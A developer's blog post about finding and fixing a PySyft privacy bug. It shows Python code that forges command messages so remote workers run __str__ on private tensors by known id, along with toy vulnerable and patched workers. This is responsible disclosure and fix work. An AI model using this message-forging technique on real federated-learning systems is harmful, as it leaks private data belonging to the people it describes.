Hack PySyft - Find Bugs Before the Malicious Guys

Since May 2019 I have been part of the Secure and Private AI Scholarship sponsored by Facebook. The course was taught by Andrew Trask and covered topics around privacy-preserving deep learning. We also learned about PySyft, and I had the chance to start contributing to this amazing project.

On July 31st, 2019, Trask launched the Hack PySyft initiative, saying 'Some day, when PySyft is deployed in production around the world, someone evil is going to try to hack PySyft and steal personal data. This Issue is where we try to do it first.' So the challenge was to hack PySyft (and fix it) before attackers do. I got motivated and started bug hunting the next day. For the rest of this post I will walk you through how I found a way to steal remote private data and how I fixed it. If you want to check the fix directly, you can find it here.

The Context

Before talking about my approach, I should first give you an overview of the environment and what we are trying to achieve. Here is a figure explaining the architecture.

I'm actually running these workers on the same machine, but the same scenario applies when they are distributed across different nodes. I control the evil worker and want to access the private tensors held by the alice, bob and charlie workers, each of which I know is stored under the id 1.

My Approach

In a normal scenario where we do federated learning among a group of workers, we can use send() and get() on tensors to move them between workers. When we send a tensor to a remote worker, we get back a pointer referencing the transferred tensor on the remote machine. This pointer holds the id of the tensor and can be used to fetch it back or to run remote operations on it (e.g. addition). So the first thing that came to my mind was to construct a valid pointer referencing a private remote tensor, since I knew its id. This method worked just fine and I was able to get those private tensors. I even started posting on Slack about it! Unfortunately, I was running an old version: Trask had already fixed that by then, and private tensors weren't accessible anymore (the other bad news is that Slack doesn't have a feature to delete personal messages :/). You can see that fix below on line 5 or check the full code on GitHub here.

def get_obj(self, obj_id: Union[str, int]) -> object:
    obj = super().get_obj(obj_id)
    if hasattr(obj, "child") and hasattr(obj.child, "set_garbage_collect_data"):
        obj.child.set_garbage_collect_data(value=False)
    if hasattr(obj, "private") and obj.private:  # the fix: never return private objects
        return None
    return obj
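
To make the pointer idea and this check concrete, here is a toy model in plain Python. It does not use PySyft at all: ToyWorker, ToyTensor and ToyPointer are hypothetical stand-ins I made up for illustration, and only the private check mirrors the snippet above.

```python
# Toy model, not PySyft: all class names here are hypothetical stand-ins.

class ToyTensor:
    def __init__(self, data, private=False):
        self.data = data
        self.private = private


class ToyWorker:
    def __init__(self, name):
        self.name = name
        self._objects = {}  # object store: id -> tensor

    def register(self, obj_id, tensor):
        self._objects[obj_id] = tensor

    def get_obj(self, obj_id):
        obj = self._objects.get(obj_id)
        # Same policy as the check above: never hand out private objects.
        if getattr(obj, "private", False):
            return None
        return obj


class ToyPointer:
    """A pointer is just (location, remote id); nothing proves ownership."""

    def __init__(self, location, id_at_location):
        self.location = location
        self.id_at_location = id_at_location

    def get(self):
        return self.location.get_obj(self.id_at_location)


alice = ToyWorker("alice")
alice.register(1, ToyTensor([1.0, 2.0, 3.0], private=True))
alice.register(2, ToyTensor([4.0, 5.0], private=False))

# The attacker only needs to know (or guess) an id to forge a pointer.
forged_private = ToyPointer(alice, 1)
forged_public = ToyPointer(alice, 2)

print(forged_private.get())      # None: the private check blocks it
print(forged_public.get().data)  # [4.0, 5.0]
```

The point of the sketch is that a pointer carries no proof of ownership, so the check has to live on the worker that holds the data.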

So I switched to the latest version and changed my strategy. Knowing that cloning a tensor does not keep the private attribute, I tried to clone it. However, calling clone() on my constructed pointer always aborted the connection between my worker and the remote one, due to an error I wasn't able to explain, since the same call works just fine with a tensor I sent myself. If anyone is interested, this path might be worth exploring.

At this point I knew I had to try harder, so I started exploring the code for a way to delete that private attribute. I found an interesting method for executing commands on tensors that placed no restrictions on private ones; you can see here that it just accesses the object using its id. However, to trigger this function on a remote worker, I had to send a message of type MSGTYPE.CMD containing the id of the remote object as well as the name and arguments of the method to call, which limited me to the set of methods a tensor has. Here are the functions I used to construct those messages and send them to the remote workers:

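import binascii

import syft as sy
from syft import codes


def command_msg(cname, oid, args: list, kwargs: dict) -> tuple:
    # Build a CMD message: call method `cname` on the remote object with id `oid`.
    mtype = codes.MSGTYPE.CMD
    msg = (mtype, ((cname, oid, args, kwargs), []))
    return msg


def send_command(ws_client, message):
    # Serialize, hex-encode and send the message over the websocket.
    serialized_message = sy.serde.serialize(message)
    ws_client.ws.send(str(binascii.hexlify(serialized_message)))
    response = ws_client.ws.recv()
    # The reply arrives as the text "b'<hex>'"; strip the b'...' wrapper before decoding.
    response = binascii.unhexlify(response[2:-1])
    return sy.serde.deserialize(response)


# Ask the remote worker to call __str__() on the object with id 1.
msg = command_msg('__str__', 1, [], {})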
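
The response[2:-1] slice in send_command can look odd. Here is a small sketch of what seems to be going on, using only the standard library: calling str() on a bytes object yields its repr, including the leading b' and the closing quote, so the receiver has to strip them before decoding the hex. The payload below is made up, and I am assuming the worker replies in the same format it receives.

```python
import binascii

payload = b"\x01\x02hello"  # stand-in for sy.serde.serialize(message)

hex_bytes = binascii.hexlify(payload)
wire_text = str(hex_bytes)   # repr of the bytes object, b'...' wrapper included
stripped = wire_text[2:-1]   # drop the leading b' and the trailing '
decoded = binascii.unhexlify(stripped)

print(wire_text)             # b'010268656c6c6f'
print(decoded == payload)    # True
```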

I wasn't sure what response I would get from the worker, so I proceeded by experimentation. First I tried calling clone() and copy(), but both resulted in an error response. I then thought of __str__() and, trying it without much hope late at night, I finally saw the private tensor I had been waiting for.

To wrap it up, I was able to steal private tensors by sending command messages to remote workers, telling them to run the __str__ method on a tensor whose id I already knew. The remote worker then responded with the string representation of the tensor. You can find the issue where I describe the bug here.
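
The shape of the bug can be reproduced with a toy worker in plain Python. This is not PySyft code: VulnerableWorker and PrivateTensor are hypothetical names, and the message carries only the inner (name, id, args, kwargs) part of the tuple I sent, without the message type.

```python
# Toy reproduction of the bug class, not PySyft code.
# VulnerableWorker and PrivateTensor are hypothetical names.

class PrivateTensor:
    def __init__(self, data, private=True):
        self.data = data
        self.private = private

    def __str__(self):
        return f"tensor({self.data})"


class VulnerableWorker:
    def __init__(self):
        self._objects = {}

    def get_obj(self, obj_id):
        obj = self._objects.get(obj_id)
        return None if getattr(obj, "private", False) else obj

    def execute_command(self, message):
        (cname, oid, args, kwargs), _extra = message
        # Bug: reads the store directly, bypassing the private check.
        target = self._objects[oid]
        return getattr(target, cname)(*args, **kwargs)


bob = VulnerableWorker()
bob._objects[1] = PrivateTensor([0.1, 0.2])

direct = bob.get_obj(1)                                     # blocked
leaked = bob.execute_command((("__str__", 1, [], {}), []))  # not blocked

print(direct)  # None
print(leaked)  # tensor([0.1, 0.2])
```

Any method that returns something derived from the data would leak in the same way; __str__ just happens to return all of it.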

Fortunately, the problem is now fixed, and the next section explains how.

The Fix

The problem was that local private tensors shouldn't be usable by remote workers, even if those workers know their ids, and execute_command() should follow the same policy as get_obj(): don't use tensors with the private attribute when they are referenced from a remote worker. You can find the fix here.

Basically, instead of accessing the object with its id directly, we are now using get_obj() which is already secured and won't return a private tensor.
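
As a rough illustration of that idea, here is a toy worker in plain Python whose execute_command() goes through get_obj(). It is not the actual PySyft patch: PatchedWorker and ToyTensor are hypothetical names, and raising PermissionError when the lookup returns None is my own assumption about how to refuse the call.

```python
# Toy sketch of the patched behaviour, not the actual PySyft patch.
# PatchedWorker and ToyTensor are hypothetical names.

class ToyTensor:
    def __init__(self, data, private=False):
        self.data = data
        self.private = private

    def __str__(self):
        return f"tensor({self.data})"


class PatchedWorker:
    def __init__(self):
        self._objects = {}

    def get_obj(self, obj_id):
        obj = self._objects.get(obj_id)
        return None if getattr(obj, "private", False) else obj

    def execute_command(self, message):
        (cname, oid, args, kwargs), _extra = message
        # Fix: go through get_obj() so the private check always applies.
        target = self.get_obj(oid)
        if target is None:
            # Assumption: refuse loudly; the real code may react differently.
            raise PermissionError(f"object {oid} is private or unknown")
        return getattr(target, cname)(*args, **kwargs)


charlie = PatchedWorker()
charlie._objects[1] = ToyTensor([0.1, 0.2], private=True)
charlie._objects[2] = ToyTensor([7, 8], private=False)

# Public tensors can still be used remotely.
print(charlie.execute_command((("__str__", 2, [], {}), [])))

# The private tensor is no longer reachable through a command message.
try:
    charlie.execute_command((("__str__", 1, [], {}), []))
except PermissionError as err:
    print("blocked:", err)
```

Routing every lookup through one guarded accessor means a new message type cannot forget the check.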

Conclusion

Exploring PySyft's code to find security bugs was a good way to learn about the heart of the project, such as the kinds of messages sent between workers and how a tensor is manipulated remotely. I hope you enjoyed this post. And of course, if you are a White Hat and can contribute to PySyft by finding and fixing security bugs, then give it a shot ;)